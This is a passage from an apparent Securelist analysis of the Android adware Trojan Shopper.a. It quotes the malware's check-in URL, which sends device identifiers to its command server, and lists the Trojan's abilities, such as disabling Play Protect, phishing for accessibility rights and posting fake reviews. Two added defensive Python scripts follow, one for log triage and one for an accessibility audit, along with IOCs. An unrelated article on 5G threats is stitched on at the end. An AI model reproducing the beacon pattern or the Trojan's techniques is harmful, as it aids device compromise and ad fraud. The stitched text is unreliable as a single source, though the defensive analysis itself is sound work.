http://api.adsnative123[.]com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&time=1567059364545&lang=en&udid=dc9c9a616665e073&unkown=true&pname=com.cleaner.qefey.kslr&size=800_561&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&anum=8&s_udid=&native=2&key=…

In response, it receives a set of commands:

Depending on the commands, Shopper.a can:

  • Open links received from the remote server in an invisible window (whereby the malware verifies that the user is connected to a mobile network).
  • After a certain number of screen unlocks, hide itself from the apps menu.
  • Check the availability of AccessibilityService rights and, if not granted, periodically issue a phishing request to the user to provide them.
  • Disable Google Play Protect.
  • Create shortcuts to advertised sites in the apps menu.
  • Download apps from the third-party “market” Apkpure[.]com and install them.
  • Open advertised apps on Google Play and “click” to install them.
  • Replace shortcuts to installed apps with shortcuts to advertised sites.
  • Post fake reviews supposedly from the Google Play user.
  • Show ads when the screen is unlocked.
  • Register users through their Google or Facebook accounts in the following apps:
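The check-in request shown above carries the device identifiers and the dropper’s package name in its query string. As an added example that is not part of the Securelist write-up, the script below runs over constructed web-proxy log lines, matches the C&C host named in the article and extracts those fields so a responder can tell which devices and which package are involved (the log format and client IPs are constructed).

```python
"""Triage helper: spot Shopper.a check-in requests in web-proxy logs.

Added example, not code from the Securelist article. It matches the C&C host
the article names (api.adsnative123[.]com) and pulls the device identifiers
the Trojan sends (udid, gaid, pname, osv, geo) out of the query string.
Log format is a constructed, simplified proxy log:
"<timestamp> <client-ip> <method> <url>".
"""
from urllib.parse import urlsplit, parse_qs

# Indicator from the article, written defanged; refang it for matching.
SHOPPER_C2_HOSTS = {"api.adsnative123[.]com".replace("[.]", ".")}
# Query parameters visible in the check-in request quoted in the article.
FIELDS = ("pname", "udid", "gaid", "osv", "geo", "network", "sdk_v")


def parse_checkin(url):
    """Return the interesting fields if url is a Shopper.a check-in, else None."""
    parts = urlsplit(url)
    if parts.hostname not in SHOPPER_C2_HOSTS or not parts.path.endswith("/search.php"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    # Missing parameters come back as "" so downstream code can rely on the keys.
    return {f: q.get(f, [""])[0] for f in FIELDS}


def triage_log(lines):
    """Return a list of (client_ip, fields) for every check-in found in the log."""
    hits = []
    for line in lines:
        cols = line.split(maxsplit=3)
        if len(cols) < 4:
            continue  # malformed line, skip it
        fields = parse_checkin(cols[3])
        if fields:
            hits.append((cols[1], fields))
    return hits


# Constructed sample log; the first request reuses the shape and values from the article.
SAMPLE_LOG = [
    "2019-10-02T10:11:12Z 10.0.0.12 GET http://api.adsnative123.com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&udid=dc9c9a616665e073&pname=com.cleaner.qefey.kslr&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&native=2",
    "2019-10-02T10:11:13Z 10.0.0.15 GET https://www.example.com/search.php?q=shopping",
    "2019-10-02T10:11:14Z 10.0.0.12 GET http://api.adsnative123.com/ads/banner.png",
]

if __name__ == "__main__":
    for ip, f in triage_log(SAMPLE_LOG):
        print(ip, f["pname"], f["udid"], f["gaid"], f["osv"])
```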

Conclusion

As noted above, one of the things that drew our attention was the use of AccessibilityService. This service is usually used by people with vision problems to facilitate smartphone use, for example by having the names of app controls, web page content, etc., read out automatically. In other cases, it can be used to emulate, on the app screen, physical smartphone keys that have stopped working. If access is requested by a program whose functionality does not require AccessibilityService, be wary. The best option is not to install apps from dubious sources at all, including from ads, whatever they promise. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that their creators will not change the payload at some later date. In any event, it’s worth getting hold of a mobile security solution that can independently detect and block dangerous apps.
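A practical way to act on the advice above is to audit which packages actually hold AccessibilityService rights on a device. The script below is an added example, not from the Securelist article; it parses the value of the system setting enabled_accessibility_services (a colon-separated list of package/class entries) and flags every entry whose package is not on an administrator-maintained allowlist. The adb command is real; the allowlist and the sample values are constructed.

```python
"""Audit which apps hold AccessibilityService rights on an Android device.

Added example, not code from the Securelist article. Reads the same setting
the system consults (Settings.Secure "enabled_accessibility_services") and
reports any enabled service whose package is not expected. The allowlist
below is a constructed placeholder; adapt it to the organisation's devices.
"""
import subprocess

# Constructed allowlist: packages whose accessibility services are expected.
ALLOWED_PACKAGES = {
    "com.google.android.marvin.talkback",   # Android's TalkBack screen reader
}


def parse_enabled_services(raw):
    """Parse the setting value into a list of (package, service_class) tuples."""
    raw = raw.strip()
    if raw in ("", "null"):            # "null" is what adb prints when the setting is unset
        return []
    entries = []
    for item in raw.split(":"):
        pkg, _, cls = item.partition("/")
        if cls.startswith("."):           # shorthand for a class inside the package
            cls = pkg + cls
        entries.append((pkg, cls))
    return entries


def unexpected_services(raw, allowed=ALLOWED_PACKAGES):
    """Return the enabled services whose package is not allowlisted."""
    return [e for e in parse_enabled_services(raw) if e[0] not in allowed]


def read_from_device():
    """Query a connected device over adb (needs adb and USB debugging enabled)."""
    out = subprocess.run(
        ["adb", "shell", "settings", "get", "secure", "enabled_accessibility_services"],
        capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    for pkg, cls in unexpected_services(read_from_device()):
        print("unexpected accessibility service:", pkg, cls)
```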

IOCs

MD5


C&C

http://api.adsnative123[.]com



5G technology predictions 2020 | Securelist

It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is the fifth generation of cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency (lag time), and as many as one million devices supported within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and full duplex.

With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.

Vulnerabilities of telco services and infrastructure

As 5G is adopted more widely, more shortcomings and flaws will surface in 5G equipment, customer systems and their administration by operators. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to set up nationwide capabilities that apply objective, specialized verification techniques to evaluate both 5G adopters and suppliers, in order to discover faults and stipulate fixes.

User safety and privacy concerns

On the privacy side, matters become more complex. The advent of 5G, with its short range, will definitely mean more cell communication towers being deployed in commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data sent by user devices, which could show exactly what is happening inside a user’s home and, at the very least, describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other service companies, such as advertisers, in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance if a client’s medical devices are disconnected and not operational. The potential threats will be even greater when critical infrastructure components such as water and energy equipment are put at risk.

Critical infrastructure expansion and risks

5G will help spread communication to a larger number of geographical areas than at present. It will also equip previously non-networkable devices with remote monitoring and control. However, as more such systems become connected, they will cease to be non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.

Action plan

5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, paving the way for technological advances, particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network, building on the existing 4G LTE network while also opening up the millimeter wave band. 5G will be able to accommodate more network-connected devices and considerably increase speeds for all users.

However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.

Furthermore, the communication trust model will not be identical to previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity. The interaction of all these devices in the 5G network will likely trigger unprecedented issues in product design and device behavior. Given these fears and the political challenges, encouraging a zero-trust network model and strict product quality compliance would help build trust between the technology adopters and providers.

Government and industry leaders should join forces to promote secure and safe 5G technology projects that enhance services and the quality of life for the citizens of smart cities.


Hi-tech vendors and governmental structures should join forces to prevent the exploitation of 5G by threat actors and preserve its innovative features for technical progress and for improving living conditions.

